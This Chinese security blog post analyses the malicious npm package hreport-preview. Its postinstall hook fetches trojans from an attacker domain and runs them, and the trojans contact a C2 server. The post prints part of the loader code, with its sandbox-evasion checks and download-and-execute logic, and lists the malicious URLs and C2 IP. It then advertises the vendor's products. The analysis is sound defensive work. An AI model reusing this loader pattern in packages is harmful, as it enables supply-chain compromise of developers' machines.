中路对线发现正在攻防演练中投毒的红队大佬

2023-08-18
北京
本文字数：1931 字
阅读完需：约 6 分钟

背景

2023 年 8 月 14 日晚，墨菲安全实验室发布《首起针对国内金融企业的开源组件投毒攻击事件》NPM 投毒事件分析文章，紧接着我们在 8 月 17 日监控到一个新的 npm 投毒组件包 hreport-preview，该投毒组件用来下载木马文件的域名地址竟然是 img.murphysec-nb.love(如下图 1)，且该域名注册时间就是 8 月 14 号，投毒者使用的注册邮箱同样是 hotmail 临时注册的邮箱，很显然大概是上次被我们公开投毒行为的攻击者正在火速赶往中路与我们对线，大哥，速度要不要这么快 -_-!

图1：whois查询

当天中午，我们还收到位于大洋彼岸漂亮国科罗拉多州、同样关注此事的软件供应链安全创业公司 phylum.io CTO Louis 来信（见图 2），询问该投毒组件是否是我们所为，很是尴尬。

图2：phylum来信询问投毒包情况

投毒事件分析

8 月 17 日上午 7 点，墨菲安全实验室监控到用户 rowebrighttix(邮箱：Rowe_Brighttix@hotmail.com)向 NPM 上传了携带远控木马的 NPM 组件包 hreport-preview（见图 3）。

图3: NPM仓库 hreport-preview 组件包

Readme 中标题为 Integrate common functions(集成公共功能) ，而下方列举的常用函数名来自于一篇中文文章（见图 4），因此投毒者大概率有中文背景。

图4：《56个JavaScript 实用工具函数助你提升开发效率！》文章中提及相关函数名

代码分析

当用户安装组件包时会执行 package.json 中的 postinstall 语句 node index.js，进而针对 Windows/Mac/Linux 系统分别从以下网址下载恶意木马，该木马会与投毒者的 C2 服务器(如：152.195.38.76)建立远程连接，进而执行恶意命令、上传/下载文件等操作，疑似被攻防演练的红队所利用：

https://img.murphysec-nb.love/w_x32.exe
https://img.murphysec-nb.love/m_arm
https://img.murphysec-nb.love/l_x64


//index.js 下载恶意木马//......
function check(){    (async () => {        const result = await getip();        if (result){            let status = false;            let donwoload = ""            const platform = os.platform();            const arch = os.arch();
            if (platform === 'win32') {
                if (uptimeMinutes.toFixed(2) > 10){                    donwoload="https://img.murphysec-nb.love/"+"w_"+arch+".exe"                    status = true                }
            } else if (platform === 'darwin') {
                if (uptimeMinutes.toFixed(2) > 10){                    donwoload="https://img.murphysec-nb.love/"+"m_"+arch                    status = true                }            } else if (platform === 'linux') {
                donwoload="https://img.murphysec-nb.love/"+"l_"+arch                await (async () => {                    const result = await checkCgroup();                    if (result) {                        status = true                    } else {                        if (uptimeMinutes.toFixed(2) > 10){                            status = true                        }                    }                })();            } else {                return
            }
            if(status) {
                await (async () => {                    const result = await downloadAndSaveFile(donwoload);                    if (result !=null){                        if (platform === 'linux' ||platform === 'darwin' ){                            addExecutablePermission(result)                        }                        runInBackground(result)
                    }
                })();            }else {                process.exit(0);            }        }    })();
}

复制代码

IOC

参考链接

排查工具及投毒情报

墨菲安全提供产品可实时拦截针对开源组件的投毒

墨菲安全的私有源网关产品可对 npm、pip、maven 等中央仓库的投毒事件进行实时的检测和拦截，同时支持对高危漏洞实现基线管理，目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。

墨菲安全提供实时的开源组件投毒情报预警可订阅

墨菲安全 0day 漏洞及投毒情报覆盖最新的 0day、1day 及投毒情报预警，所有情报经过严格的安全专家研判，保障企业获取的第一手的高质量漏洞及投毒情报，更有比 CVE 漏洞库多 25+额外的详细分析字段，目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。

以上功能企业可通过以下方式申请试用：

一、长按二维码申请：

二、访问申请链接：

https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe

发布于: 刚刚阅读数: 7

原文链接:【http://xie.infoq.cn/article/11f8851aaa52e08d4475a0bfd】。

墨菲安全

关注

还未添加个人签名 2022-03-23 加入

还未添加个人简介

发布

暂无评论

创作场景